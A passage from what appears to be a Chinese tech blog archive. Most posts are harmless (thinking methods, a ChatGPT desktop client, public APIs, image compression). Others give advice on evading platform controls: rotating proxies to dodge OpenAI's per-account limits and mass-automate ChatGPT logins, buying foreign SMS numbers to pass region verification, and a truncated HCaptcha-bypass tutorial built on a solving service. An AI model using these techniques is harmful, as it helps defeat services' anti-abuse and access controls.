一旦服务运行起来，由于代理本身是全球动态或者动态数据中心，因此里面的代理 IP 会动态变化。这样，对于单个账号来说，每次请求 OpenAI 的 IP 都在变化，就可以解除单个账号访问的限制。

注意：我请求 OpenAI 是用的access_token的方式，目前并不会造成账号被封的问题。

动态长效 ISP

我们刚才讨论了通过 API 请求方式的隧道代理设置，这种方式相对方便。但在某些情况下，我们实际上想要的是更稳定、长效的代理，即动态长效 ISP。

我通常会将这种代理用于一些模拟登录服务。由于我需要使用浏览器进行这些服务，如果我将浏览器设置为一个动态切换的隧道代理，那么在一次网页请求中，所有请求的 IP 地址都可能是不同的。因此，我们实际上希望在同一浏览器会话下，IP 地址能够保持相对稳定。

于是，动态长效 ISP 就能派上用场。我通常使用模拟浏览器驱动的方式来启动浏览器，然后动态设置代理 IP 为动态长效 ISP。设置完成后，我便可以启动浏览器进行网页模拟，比如登录模拟 GPT 网站等。

下面是一个简单的 Playwright 的代理设置样例：

def init_browser(self):
    self.browser = p.chromium.launch(headless=False, proxy={
        'server': "http://proxy.ipidea.io:2336",
        "username": "mAZFcgDR-zone-isp-session-2146kz42f-sessTime-5",
        "password": "<password>"
    })
    self.page = self.browser.new_page()

浏览器设置完成后，我就可以执行一些自动化操作，比如模拟登录 ChatGPT、模拟登录其他网站等。在这个过程中，我几乎没有遇到不可用的情况，可用率非常高。

有了这个动态长效 ISP，我成功完成了大量 ChatGPT 账号的模拟登录过程，可谓是非常方便！

总结

好了，到这里我这篇文章就接近尾声了。

我们来回顾下这篇文章的内容，首先对 IPIDEA 做了基本介绍，然后介绍了基本的使用方法以及我自己的使用体验。

整个体验下来我觉得还是挺顺的，没有遇到什么无法访问的时候，整个访问速度也不错。

如果你也有海外代理的需求，我非常建议你也来试试看。

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2023-05-29 阅读次数：本文字数： 4k 阅读时长 ≈ 4 分钟

元思考:对思考的思考

思考，简单却有困难的词。它离我们“近在咫尺”却又似乎“远在天涯”。那究竟什么叫思考？什么是思考？那么该如何思考？

思考的定义

说到思考，那咱们也不得不对其进行追本溯源，去揪一下它的细节。什么是思、什么是考、什么是思考
思，汉语一级字，读作sāi或sī，在指“心情”等时旧读为sì，最早见于金文，其本义是深想、考虑，由此引申出怀念、悲伤、意念、创作的构想等。《说文解字》认为是“容也”。
考（拼音：kǎo）是汉语通用规范一级字（常用字）。在甲骨文和金文中，考和老是同一个字，均像一老人举杖之形。考字用为年老之义，从商代经西周一直延用至于春秋战国时代。
先秦时“考”常用作对父亲的称呼，可以指在世的，也可以指去世的。
现代汉语的“考”多用于考察、考核，又表示研究、推求。这些都是后来出现的假借义，与考的本义无关。
那什么是思考呢？由上可知思就是深想，考虑就是验证，二者形成闭环故为思考。那么思考就是，就是
思考就是考虑与验证的过程！
btw

考虑在此的意思是检索，检索已有的知识。
验证在此的意思是过滤，过滤检索的知识。

先split再merge，那就是答案啊

思考是思维的一种探索活动，思考力则是在思维过程中产生的一种具有积极性和创造性的作用力。
思考源于主体对意向信息的加工。人之思考是自己心智对意向——信息内容的加工过程。任何思考的进行都是在
联想—连锁反映中进行的推理与演算——信息内容的加工。如：相似联想、接近联想、对比联想、因果联想等理解来进行思考是必然的。

思考流程

由上可知，思考流程是检索 -> 验证 -> 加工(排列组合) => 结果。需要注意的是检索与验证并不是仅是单次的，也可以是多次。

论3 * 4的思考过程

是如何计算出来的呢？当然，各位早就知晓了答案，不就是12嘛。浪费表情，so easy, 摊手🤷

思考过程如下三种情况所示

无法理解数字3、乘以✖️、数字4的含义。思考失败
理解数字3、乘以✖️、数字4的含义，回归原始。点阵图数数来解决
1. 建立横竖轴（x、y）
2. x轴放三个点点·,y轴放四个点点·(见代码片段-1)
3. 一个一个数，是12诶！

· · ·
· · ·
· · ·
· · ·

学会乘法，知道乘法表（嘿嘿，回来。你已经会背乘法口诀表啦！）。直接三四一十二，perfect

复盘 3 * 4

在上面对
的各种假设的可能性进行了推延生与证明。相信在此时你也和笔者一样又有新的疑问了， 3* 4 不是我们数(算)
出来的嘛？不是，在这之前存在一些“可选”项
对，是思考出来的。流程如下

拓展：计算机“思考”过程

书写代码（在此省略代码编写的种种）
计算机进行“思考”
1. 思：编译(将代码转化成计算机可理解的“知识”)。（编译过程，在此不过多赘述），
2. 考：验证编译
加工(位运算)
得到结果

题外话：人与计算机的思维差异

人：“聪明”，但加工慢
计算机：“愚昧”，但加工快。快速的准确的yes or no， for loop

所以，该如何写出“多快好省”的代码呢？尝试二者结合试试

谈谈想象力或创造力

其本质还是思考

检索
验证
加工(排列组合)

例子：钢铁侠

这世界本没有钢铁侠，只是有人给他创造，想象了出来，并赋予其名。
zoom out(宏观角度): 钢铁(科技与狠活) + 人(侠)
zoom in(微观角度)：类似于计算机，譬如ACR核反应堆(类似于电脑的电) 、贾维斯(人工智能) 等等

提高思考力？

思考力：即思考的能力

由上可知，思考能力的强弱取决于两部分。

已有背景知识的存量
梳理加工过滤的能力

那么对此，我们可以得出。得出提高思考力的方法

增加知识的存量质与量
- 量：拥有更多的知识
  - 输入-> 学习、思考 -> 化为己用
- 质
  - 建立连接：学习并非单纯的记忆，而是连接。旧知识 + 新知识 => 新认知
  - 点-线-面-体-势，知识结构化，建立有关联的强链接
    ，让提取的知识不在是点而是线、是面、是体、甚至是势。不在有知识孤岛，也让思考更加开阔不在局限
增强梳理“过滤”能力
- 随意搭配-> 创造力
  - 加减乘除，排列组合
- 套路搭配 -> 方法论
  - 怎么切、怎么分流程与关键节点

case by case: 构建思考框架

经过对于其的整合梳理，我们不难得到可复用的方法论。常见的方法如下

逻辑推理：三段论
高效沟通：PREP法则
工作总结：AEAP
创业计划：商业模式画布
工作规划：SMART原则
质量管理：PDCA原则

学习能力

学习金字塔
费曼学习法
刻意练习
RIA阅读法
二八定律

思考能力

黄金圈法则
八何分析法（5w3h、6w2h）
思维导图
策略选择：SWOT分析
梳理信息：MECE法则
10/10/10法则
冰山模型

创造能力

六顶思考帽
头脑风暴
逆向思维
类比思维
SCAMPER创新思维

设计能力

设计思维
最小可行性产品（MVP）
峰终定律
AARRR漏斗模型
上瘾（HOOK）模型

共情能力

五大圈层模型
高效倾听模型
情绪ABC模型
乔哈里视窗
冰山模型

演讲能力

故事五要素
结构表达: SCQA原则
结构阐述：STAR原则
SRAR模型
STORY模型
“英雄之旅”模型

领导能力

领导力梯队
情景领导力模型
GROW教练模型
管理4C模型
TOPIC模型

整合能力

杠杆思维
POA行动
系统思维
整合思维模型
多元思维模型

小结

既要有“底层逻辑”也要有“顶层设计”。

事物间的共同点，就是底层逻辑。只有不同之中的相同之处、变化背后不变的东西，才是底层逻辑。
只有底层逻辑，才是有生命力的。只有底层逻辑，在我们面临环境变化时，才能被应用到新的变化中，从而产生适应新环境的方法论。所以我们说“底层逻辑+环境变量=方法论”

以终为始，目标导向。
如论是如何思考，何种方法论。最终都是为“问题”所服务的，切勿拿着锤子看什么都是钉子！这并非此文的本意。
上述关于“如何思考” 阐述是微观，那么也希望你也能站在更顶层层次看待anythings

Referer

https://baike.baidu.com/item/%E6%80%9D/53644
https://baike.baidu.com/item/%E8%80%83
https://baike.baidu.com/item/%E6%80%9D%E8%80%83
如何才有高效的思考能力
人人都能变聪明的四个“核武器”
《底层逻辑》
《麻省理工深度思考法》

作者 Payne 发表于 2023-02-25 阅读次数：本文字数： 2.5k 阅读时长 ≈ 2 分钟

技术杂谈 推荐一个方便好用的 ChatGPT 客户端

这段时间，想必大家肯定早就领教过 ChatGPT 的威力了吧。

我们跟它说各种内容，比如写代码、汇总周报、写邮件、写诗句、查百科什么的，ChatGPT 都对答如流，根本不在话下。

比如说让它基于 Vue3 写一个 div 的拖拽实现，思路清晰，代码正确：

比如让它汇总和润色一个周报：

写的还蛮“充实”的感觉的。

当然还有各种有趣的功能大家去 ChatGPT 继续试试吧～

那其实这次我要介绍的不是 GhatGPT，而是一个 ChatGPT 的客户端。

为什么要客户端呢？因为有了客户端我们就不用每次单独开一个浏览器，而且也不会迷失在无数的 TAB 里面了，而且客户端其实基于 ChatGPT 多了一些新的功能。

让我们来看看吧。

介绍

开门见山，这个客户端的 GitHub 地址是：https://github.com/lencx/ChatGPT，支持 Mac、Windows、Linux。

截止写文的时候，客户端已经更新到 0.7.0 版本，支持的功能有：

多平台的支持，Mac、Linux、Windows
支持导出 ChatGPT 的历史，生成图片、PDF、分享连接
自动升级提醒
通用/全局快捷键
系统托盘设定
支持一些快捷命令和配置选项

下面我们就来看看怎么搞吧。

安装

安装其实挺简单的，官网提供了下载安装包，大家可以到这里 https://github.com/lencx/ChatGPT#-downloads 选择自己平台的安装包下载安装。

我这边是 Mac，安装完了之后会有这样的一个图标：

打开之后需要让我们注册或登录 OpenAI 的账号。

界面和 https://chat.openai.com/ 是一样的，因为客户端其实就是外包了一个网页而已：

需要提醒下的是，如果你从来没用过 GhatGPT，在注册新账号的时候，有一步是验证手机号，这时候如果我们输入国内手机号会被提示“地区不被支持”。这时候建议开全局国外代理，并且使用国外手机号来完成验证。

这里推荐一个网站 https://sms-activate.org/，我们可以花一块钱左右买到一个 OpenAI 验证的手机号接收一次验证码。

搜索 OpenAI 服务，并选择对应地区即可，我选择的是马来西亚能成功接收到验证码（一开始选了一个印度的但没接收到验证码），而且也挺便宜的。

就是这样，希望大家能成功注册到一个 ChatGPT 账号。

测试

接下来就是一些常规操作了，进入之后我们就可以输入各种文字来尝试 ChatGPT 了，比如：

这时候大家会说，这客户端和网页有啥不一样啊？网页也有这功能啊。

有的，看图里面，右侧的几个其实就是客户端多出来的功能，分别是生成分享图片、PDF 和链接。

比如我点一下“生成分享图片”的按钮，就可以生成这样的一个分享图，还蛮不错的：

当然 PDF 也是一样的。

快捷命令

当然我觉得客户端更好用的功能在于一个叫快捷命令的功能，我们可以输入一些命令，启用 ChatGPT 的一些功能。

首先，我们输入一个 / 就能激活快捷命令，如图所示：

我们可以看到，这里已经内置了好多个快捷命令，比如 poet、chef、rapper 等，代表了让 ChatGPT 实现的一些功能。

比如这里有一个 /javascript_console 的快捷命令：

选中之后输入框就会多这么一些文字：

I want you to act as a javascript console. I will type commands and you will reply with what the javascript console should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. do not write explanations. do not type commands unless I instruct you to do so. when i need to tell you something in english, i will do so by putting text inside curly brackets {like this}. my first command is console.log(“Hello World”);

大意就是告诉 ChatGPT，我会告诉你一段 JavaScript 代码，你帮我执行并输入结果，然后我的第一个命令是一个 console.log 语句。

对，就是这样，直接发出去即可：

然后 ChatGPT 就会按照我们说的来执行了。

接着，由于 ChatGPT 有记忆功能，它能知道刚才我们让它干了什么。

所以接下来，我们就可以接着让它干事情了。

接着继续输入第二段代码，它就能接着继续输出了：

是的，就是这个流程。

还有很多其他的功能，比如输入 /poem 作诗：

接着我们输入新的作诗要求就可以了：

OK，这下大家应该理解了吧，我们利用了 ChatGPT 的上下文记忆功能，结合一些快捷键，就能快速让 ChatGPT 帮我们完成想要的事情了。

那所以，如果我们把想要 ChatGPT 做的工作都收录整理下来，那么以后是不是就能直接调用了。

比如说，我输入一个中文类别的命令 /汇总周报，然后描述好要让它帮我们做什么，接着就可以让它帮我们汇总周报了。

想的挺好，ChatGPT 客户端可以做到吗？可以！

我们通过 ChatGPT 的菜单里面打开 ‘Control Center’，就可以看到这样的一个配置界面：

我们可以切换到 Language Model - User Custom 部分，这里我们就可以添加一些自定义指令了。

比如我这里点击 Add Model 按钮，添加这样的一个指令：

这里第一个 /{cmd} 就是我们到时候实际敲的命令，Act 就是对命令的一个描述，会出现在命令的描述里面，Prompt 就是告诉 ChatGPT 的话，这里我们需要详细描述一下需要 ChatGPT 做的事情，并给出一个示例。

编辑好了之后点击保存。

然后重启下 ChatGPT，这时候我们就可以输入 /汇总周报 命令了：

然后点击空格转换为实际的文字，然后发出去：

OK，接下来我们就可以让它帮我们整理第二份周报了，而且第二次也不需要告诉他那么多前提了。

所以，到现在大家能体会到这个快捷指令的便捷用途了吧，我们可以提前录入好一些要求，然后第二次我们就无需赘述那么多要求，直接输入最直接的要求，ChatGPT 就可以帮我们完成其中的操作了。当然第一次的时候，我们也可以自行替换想要替换的输入文本，同样也可以达成想要的效果。

有人说？那我应该整理一些什么命令呢？都行呀，比如整理周报、起草邮件、写 Python 代码，都行。

这里给大家介绍一个资源，叫 awesome-chatgpt-prompts，GitHub 地址是： https://github.com/f/awesome-chatgpt-prompts，这里面汇总了各种快捷命令，大家也可以到里面寻找些灵感，也可以贡献命令到这个 Repo，这样命令就会被自动收录到 ChatGPT 这个客户端里面。

总结

好了，这次给大家介绍了 ChatGPT 客户端的基本使用，想必 ChatGPT 网页来说，会有如下的几个优点：

独立的窗口运行，不用每次单独打开浏览器，也不会迷失在茫茫的 TAB 里面。
带了额外的转换分享功能，比如生成图片、生成 PDF、分享链接等，这是网页所不具备的功能。
带了便捷的快捷命令功能，利用它我们可以快捷输入想要的命令，并且可以自己管理一些命令，已备后续之需。

大家可以试用哈，希望这次分享对大家有帮助！

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-12-27 阅读次数：本文字数： 3k 阅读时长 ≈ 3 分钟

技术杂谈 推荐一套公开的 API 接口

在某些情况下，我们可能想做一些 Demo 或者写一些测试，比如想做个网站展示一些宠物的图片，或者想实现某个 API 请求的实现逻辑，这时候你会怎么做呢？

自己找点数据然后搭建一套 API 接口吗？

可以是可以，虽然说并不是特别麻烦，但准备数据、编写逻辑、设置跨域等还是要费一些时间的。

其实，网上有很多很多免费的 API 接口可以直接拿来用的，而且各种类型的数据应有尽有，有了它们，我们就不用费尽心思自己搭建 API 了。

接下来就来给大家介绍一个库，里面收集了各种公开的数据接口。

public-apis

这个仓库就叫做 public-apis，其 GitHub 地址是 https://github.com/public-apis/public-apis。

其介绍是：

A collective list of free APIs for use in software and web development

一套公开 API，可以用于软件和 Web 开发。

这些 API 特别全面，包含了各种各样的类别。

比如我们先来看下他的一些分类：

如图所示，可以看到这个仓库划分了很多大类别，比如动物、设计、书籍、商业、娱乐等几十个大类，按照字母排序，每个大类都有对应的 API 可供我们使用。

比如我们先看下动物的分类，则可以发现类似如下的表格：

这个表格一共有五列，包括 API 的地址、描述、是否需要 Auth、是否支持 HTTPS、是否支持跨域，可以看到动物类别就有好多 API，比如 Dogs、Cats、Bear 等等，这些 API 就可以返回一些猫、狗、熊等图片的列表。

一般来说，我们可以选择 Auth 为 No，HTTPS 为 Yes、CORS 为 Yes 的，即使用 API 不需要 key，同时支持 HTTPS，而且支持跨域，这样在网页中我们就可以自由调用了。

我们随便选几个来看下。

实例演示

Dogs API 就是其中一个，网址为 https://dog.ceo/dog-api/

打开之后我们可以看到一个介绍网站，同时这里有一个 Fetch 按钮，我们点一下就可以获得一张随机的狗狗图片。

其 API 地址就是 https://dog.ceo/api/breeds/image/random，我们也可以直接用浏览器打开，结果如下：

可以看到返回结果是 JSON 格式，我们对其进行简单解析就可以提取里面的 message 字段，也就能获得一张随机的狗狗照片，然后展示在网站上了。

简单写个 html 页面，几行代码就可以实现随机狗狗图片的展示：

<html>
  <body>
    <img id="dog" />
  </body>
  <script>
    fetch("https://dog.ceo/api/breeds/image/random")
      .then((response) => response.json())
      .then((data) => {
        document.getElementById("dog").src = data.message;
      });
  </script>
</html>

运行效果如下：

是不是还是挺方便的？

另外回到网站本身，它还提供了相关文档介绍所有接口的用法：https://dog.ceo/dog-api/documentation/

比如这里有列出所有狗的品种、根据品种返回狗的照片、随机狗的照片等等，具体可以去看文档哈。

其他介绍

另外其实还有很多有意思的 API，我们随便来看几个。

EmojiHub

比如 EmojiHub 这个 API 提供了接口来返回一些 Emoji 表情，种类丰富多种多样，https://github.com/cheatsnake/emojihub

Icon Horse

Icon Horse 提供了各种返回网站图标的功能，https://icon.horse/

比如维基百科就可以填写 Wikipedia.org，就可以获取其网站图标了：

bible-api

这个 API 提供了多语言版本的《圣经》内容：https://bible-api.com/：

Free Dictionary API

Free Dictionary API 提供了各种单词的查询和释义，我们可以直接用 API 获取某个单词的含义、发音、音标、翻译等：https://dictionaryapi.dev/

EconDB

EconDB 提供了全球宏观经济数据，公开免费：https://www.econdb.com/

NBA stats

NBA Stats 提供了 NBA 有史以来各种数据，比如每场比赛数据、球员数据等等：https://any-api.com/nba_com/nba_com/docs/API_Description

Nobel Prize

Nobel Prize 这个接口返回了有关诺贝尔奖项的各种记录和活动：https://www.nobelprize.org/about/developer-zone-2/

Faker API

Faker API 提供了各种假数据生成器，比如生成假名字、假地址、假电话号码、假地理位置等等，方便测试和开发使用：https://fakerapi.it/en

技术杂谈 什么是 dummy change？

最近在工作上遇到了一个新词：dummy change，是在邮件沟通过程中遇到的，起因是某个 Pipeline 有个 Bug，但配置文件又没啥问题，所以对方建议让我对配置文件做点 dummy change，然后来触发 Pipeline 的刷新。

我一开始就不懂，啥叫 dummy change 啊？

然后我就查了下，这里分享给大家。

dummy，意思就是假的意思，就是假的 change，就是实际上变了，但看起来又没变。

比如，一个文件，我们在某个地方加个空格、加个空行，表面上其实配置文件的内容没有变化，配置还是原来的配置，但是文件本身因为一个空行或者空格而发生了变化。

所以，dummy change 其实大多数就是文件某处改个空格、加个空行、修改点无关紧要注释啥的，没啥本质影响，但实际让文件本身变化，以便引发一些相关操作。

希望对大家有帮助。

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-06-12 阅读次数：本文字数： 398 阅读时长 ≈ 1 分钟

个人随笔 学习新知识时的几个技巧

时代在发展，我们也需要不断进步和学习。

在一生中我们需要学习各种各样的新知识，但有时候我们在学习的时候可能感觉比较茫然，或者无从下手，或者不知道这个知识到底有什么用，或者学的过程中都不知道学到哪里了，还有多少才会学完。

这里，分享我看《暗时间》书了解到的一些技巧。

主要就是三个，也就是说，学习知识时来问自己三个问题：

它的本质是什么
它的第一原则是什么
它的知识结构是怎样的

它的本质是什么

我们拿技术知识为例，比如我们要学 Django 开发一个网页，那么我们实际上是学了什么？实际上是学了一些 Django 的 API 和命令的用法、 Python 的语法。我们根据 API 的操作说明做了，那其实就能完成一个网页的搭建，因为我们使用了它现有的框架，基于现有的轮子来做东西。

但这里来了一个问题，假如我们之前是基于 1.10 版本的 Django 框架开发的网页，但现在 Django 升级到了 3.0，很多 API 的用法都变了，那之前 1.10 的 API 即使我们用的滚瓜烂熟甚至都背过了都没啥用了，因为 API 改了，那我们就不得不再去查文档看具体的用法。

这时候，我们要想想，学习这个 Django 技术的过程中，我们学到的是什么？实际上我们学到的就是 Django 框架的一些 API 用法，利用 Django 这个框架写了自己的业务逻辑而已，Django 已经帮我们处理了很多底层的东西，从而快速成型了一个网站。而网站的本质又是什么？实际上就是用户在浏览器中输入对应的 URL，然后服务器对相应的请求进行处理，并返回对应的内容，这本身又涉及到计算机网络很多的基础知识，比如请求都包含了什么，怎样进行逻辑处理，怎样和数据库交互，怎样返回响应，这些 Django 都帮我们做了，我们在写的时候无需关心得这么底层，但我们需要知道这背后发生的事情。如果我们压根不知道 Django 背后发生了什么，只是知道 API 变了，那出现问题的时候，我们根本不知道怎么去追查问题，不可能去从源码级别分析根本原因，也不知道怎么去优化和提速。

上面只是一个例子，很多知识其实背后都有其本质的东西，和一些不变的东西。而越本质的东西基本上变化的情形越少。

我们经常会感叹自己跟不上新技术的发展，却往往忽略了这些新技术背后都是什么。现在很多的新技术只是一层皮而已，比如 Django 框架基于 Python 对计算机网络、数据库等底层内容进行了很好的封装，比如 Scrapy 框架底层就包括网络请求处理、消息队列等内容，Vue 框架则是基于原生 JavaScript 对数据监听和绑定做了很好的封装和优化，通过虚拟 DOM 等机制来处理了页面渲染。那这些技术还有没有更底层的内容呢？有，比如浏览器、操作系统、计算机体系结构、计算机组成相关的内容。越追到底层，越发现其本质越是不变的。

另外，除了一些技术相关的本质内容，还有一些不变和永不过时的东西，比如算法和数据结构、基本的程序设计理论、良好的编码习惯、分析和解决问题的能力、强大的学习能力、旺盛的求知欲、良好的思维方式。

所以，我们尽量去抓住一些本质的、不过时的东西，这些才是最稳的。

第一原则是什么

刚才我们说了，学一个东西我们要了解本质的东西，那么难道我要在学习 Django 框架的时候要把计算机网络、操作系统、计算机组成原理等所有的东西全都挨个学一遍？这得学到猴年马月啊。

所以，这里需要澄清的一点是，我们说要了解本质是什么并不是要求我们现在立马就把本质的东西全部去了解清楚，因为这里面的体系实在是太庞大了，递归学进去啥时候才能出得来啊？

所以，我们可以先从大致层面上知道它的本质，知道这个要学的知识在整个知识体系中处于一个怎样的位置上，有一个整体大局观。然后其本质的东西，我们有时间可以重点再一个个突破，因为毕竟这是很多技术的共性。

所以，这里就再引出了第二个需要注意的点：我们要知道学习这个东西的第一原则是什么。

比如我要学习好 Django 框架，那么我的原则其实就是学会 Django 的 API 和命令的用法，然后能够利用它搭建好网站，知道它能够做什么，有什么优缺点，有问题了知道怎么查，这是第一原则。

在学习的时候，我们按照这个原则来学习，这样整体效率和方向感就会好很多。

这“第一原则”听起来和刚才说的“了解本质”有点冲突啊？但实际上不冲突，“第一原则”说的是我们学知识的时候我们心里有一个目标和原则和大方向，“了解本质”是说我们也要知道这项知识它的整体定位和其背后都是什么。至于本质的东西，我们后面可以再慢慢去击破，去慢慢深入了解。

知识体系是什么

知识体系嘛，顾名思义，就是整体脉络。

我们常常会觉得学习一个技术，不知道啥时候是个头，不知道学到哪里了，这其实就是缺乏了整体的知识体系。

一个知识体系可以帮我们在头脑中建立一个整体的框架，其实就像一本书的目录大纲，一门课的思维导图一样，多去了解下这些内容，会帮助我们很好地建立一个知识体系。

另外，某些知识可能并没有现成的知识体系，我们也要想办法构建一个知识体系。

这里有一个小技巧，学习一个领域知识的时候，时时把“最终能写出一篇漂亮的综述”放在大脑中提醒自己，这有助于我们在阅读中有意无意地整理知识的结构、本质和重点，经过整理之后的知识理解也会更深刻。

共勉。

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-06-12 阅读次数：本文字数： 2.1k 阅读时长 ≈ 2 分钟

技术杂谈 推荐一个超强的图片压缩网站！

我们肯定经常跟图片打交道吧，不管是写文章、传图片还是网站开发，我们或多或少都要插图，但有时候图片体积比较大的时候就会带来加载速度慢的一些问题，那么这时候你可能会有这么一个需求：

有没有什么办法在保证图片清晰度的时候把图片的体积压缩到最小？

大家通常会用什么办法呢？

我的话其实用的比较多的办法就是使用 PS，然后另存为 Web 所用格式，但用到这个功能我还得额外装个 PS，感觉比较麻烦。

所以，今天给大家推荐一个非常好用的图片压缩网站，可以将图片体积缩小一大半，同时几乎不改变图片清晰度。

简介

直接开门见山，网站地址是：https://tinypng.com/，名称就叫 TinyPNG。

看名字我们就知道 tiny + png，tiny 就是小，png 就是图片的一种格式，就和图片压缩很接近了，简单好记。

那它的主要功能是什么呢？我们来看下主页：

可以看到，网站的一个大标题就是 “Smart WebP, PNG and JPEG compression”，意思就是智能的 WebP、PNG 和 JPEG 格式的压缩工具。

那么这个网站做了什么呢？

TinyPNG 网站举了一个例子：

可以看到原始图片和压缩后的图片对比几乎没有什么差别，而压缩前图片有 57KB，压缩后只有 15 KB。

测试

看介绍感觉很厉害的样子啊，那我们来测试下看看吧，这次我们从网上先保存一张图片来看看：

这张图片原图大小是 3.5MB，分辨率是 2356x1310，如图所示：

下面我们来上传下，点击这里就可以上传了，或者直接把图片拖拽到这个位置就可以：

这里写着我们可以上传最多 20 张图片，每张图片大小不超过 5MB，感觉这个限制已经相对宽松了。

压缩完成之后显示，我们图片的最终大小成了 999.1KB，整整缩小了 71%！

到底效果行不行，拉出来溜溜。

然后我们可以直接点击 Download 按钮下载下来就好，压缩后的图片效果如下：

放在一起对比下：

能看出哪个才是原图吗？

其实第二张才是原图，是不是几乎看不出什么差别？

背后技术

看简介可以了解到，TinyPNG 这个网站使用了有损压缩技术来减小 WebP、PNG、JPEG 格式图片的文件大小，它通过有选择地减少图像中的颜色数量来达到压缩效果，同时由于咱们人眼对这种细微颜色变化感知比较弱，所以压缩前后图片在人眼看到几乎是没什么区别的。

对于 PNG 图片来说，它其实细分为 PNG-8 和 PNG-24，它们有什么区别呢？

其实我们知道，每一个图片都是由一个个像素点组成的对吧，每一个像素点都有一定的颜色，那许许多多的像素点排列在一起就组成了一张图片。

在计算机里面，每个像素点其实都有一定的存储单位来表示，对于 PNG-8 来说，一个像素点是由 8 位二进制数表示的，而计算机中 8 位最多表示 2 的八次方，即 256 种组合，其实一个像素就能显示 256 种颜色。同理，而 PNG-24 就相当于一个像素点用 24 位来表示，所以能表示的颜色数量就是 2 的 24 次方，结果约 1600 万。所以 PNG-24 相比 PNG-8 来说每个像素可表示的颜色就多非常多，色彩也就更丰富，所以 PNG-24 适合摄影作品之类的比较丰富的图片。但随之而来的，PNG-24 的文件体积相比 PNG-8 也会大很多。

而对于人眼来说，其实一张图片用 PNG-8 和 PNG-24 来表示，如果不仔细放大看的话，效果其实不太明显。所以有时候我们为了更高的压缩比，就可以选用 PNG-8 这种图片存储格式，其体积会小一大半，加载速度也会快很多。

所以这种图很适合在网站开发的时候使用，所以你可以看到一些网站的 Logo、Banner 图都是 PNG-8 类型的图片。

所以实际上，TinyPNG 这个网站其实就是把 PNG-24 的图转成了 PNG-8 而已。

进一步测试

那知道原理之后，我们如果把 PNG-8 的图片再上传给 TinyPNG 这个网站，还能获得压缩吗？

我们来试试。

可以看到，我们将压缩后的图片再次尝试压缩，这次最终可能就是 959.9 KB 了，只获得了 4% 的压缩，所以可以看到几乎也没有什么压缩空间了。因为它无法再将 PNG-8 进一步降低每个像素的表示位数了。

支持情况

看来这个压缩效果的确还可以的，那么它的兼容性怎么样？

介绍说，它支持所有主流的浏览器，比如 Chrome、Firefox、Safari、Edge 甚至一些移动设备浏览器也是有很好的支持的，所以平时只要我们有浏览器，就能用了。

支持 APNG 吗？

不知道大家有没有听说过一种 PNG 图片格式，叫做 APNG，其实就是 Animated PNG，就是可以动的 PNG 图片，比如这张图片：https://ezgif.com/images/apng.png

大家可以打开看看效果。

对于这种图片，现在主流的浏览器也都支持显示了，如果你的浏览器支持，那么能看到这张图片是动的。

TinyPNG 对 APNG 这种格式也是支持的！

对于 PS 的支持

TinyPNG 也提供了 PS 的插件，安装之后我们也可以在 PS 里面直接使用 TinyPNG 了：

这个插件适用于 PS 的 CS5、CS6、CC2013-2022 所有版本。

具体大家可以看 https://tinypng.com/photoshop

不过坏消息是，这个插件是收费的，大家按需上车。

总结

好了，以上就是本文章全部内容了，希望对大家有帮助。

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-06-03 阅读次数：本文字数： 2.1k 阅读时长 ≈ 2 分钟

爬虫 HCaptcha的模拟点击破解教程来了！

前面的文章我们介绍过 ReCaptcha 的模拟点击破解教程，但除了 ReCaptcha，还有另外和 ReCapacha 验证流程很相似的验证码，叫做 HCaptcha。

ReCaptcha 是谷歌家的，因为某些原因，咱们国内是无法使用 ReCaptcha 的，所以有时候 HCaptcha 也成了一些国际性网站的比较好的选择。

那今天我们就来了解下 HCaptcha 和它的模拟点击破解流程。

HCaptcha

我们首先看看 HCaptcha 的验证交互流程，其 Demo 网站为 https://democaptcha.com/demo-form-eng/hcaptcha.html，打开之后，我们可以看到如下的验证码入口页面：

看起来入口和 ReCaptcha 很相似的对吧，其实验证流程也是很类似的。

当我们点击复选框时，验证码会先通过其风险分析引擎判断当前用户的风险，如果是低风险用户，便可以直接通过，反之，验证码会弹出对话框，让我们回答对话框中的问题，类似如下：

这时候我们看到 HCaptcha 验证码会给我们一个问题，比如上图的问题是「请点击每张包含飞机的图片」，我们需要从下面的九张图中选择出含有飞机的图片，如果九张图片中，没有飞机，则点击「跳过 / Skip」按钮，如果有，则将所有带有飞机的图片都选择上，跳过按钮会变成「检查 / Verify」按钮，验证通过之后我们就可以看到如下的验证成功的效果了：

是不是整体流程和 ReCaptcha 还是还是非常相近的？

但其实这个比 ReCaptcha 简单一些，它的验证码图片每次一定是 3x3 的，没有 4x4 的，而且点击一个图之后不会再出现一个新的小图让我们二次选择，所以其破解思路也相对简单一些。

如何破解

整个流程其实我们稍微梳理下，就知道整体的的破解思路了，有这么两个关键点：

第一就是把上面的文字内容找出来，以便于我们知道要点击的内容是什么。
第二就是我们要知道哪些目标图片和上面的文字是匹配的，找到了依次模拟点击就好了。

听起来似乎很简单的对吧，但第二点是一个难点，我们咋知道哪些图片和文字匹配的呢？这就是一个难题。

前面 ReCaptcha 的破解过程我们了解过了使用 YesCaptcha 来进行图片的识别，除了 ReCaptcha，YesCaptcha 其实也支持 HCaptcha 的验证码识别，利用 YesCaptcha 我们也能轻松知道哪些图片和输入内容是匹配的。

下面让们来试试看。

YesCaptcha

在使用之前我们需要先注册下这个网站，网站地址是 https://yescaptcha.com/i/CnZPBu ，注册个账号之后大家可以在后台获取一个账户密钥，也就是 ClientKey，保存备用。

OK，然后我们可以查看下这里的官方文档：https://yescaptcha.atlassian.net/wiki/spaces/YESCAPTCHA/pages/24543233/HCaptchaClassification+Hcaptcha，这里介绍介绍了一个 API，大致内容是这样的。

首先有一个创建任务的 API，API 地址为 https://api.yescaptcha.com/createTask，然后看下请求参数：

这里我们需要传入这么几个参数：

type：内容就是 ****
queries：是验证码对应的 Base64 编码，这里直接转成一个列表就可以
question：对应的问题 ID，也就是识别目标的代号，这里其实就是问题整句的内容
corrdinate：一个返回结果的控制开关，默认会返回每张图片识别的 true / false 结果，也就是第 x 张图片是否和图片匹配，如果加上该参数，那么 API 就会返回对应匹配图片的索引。

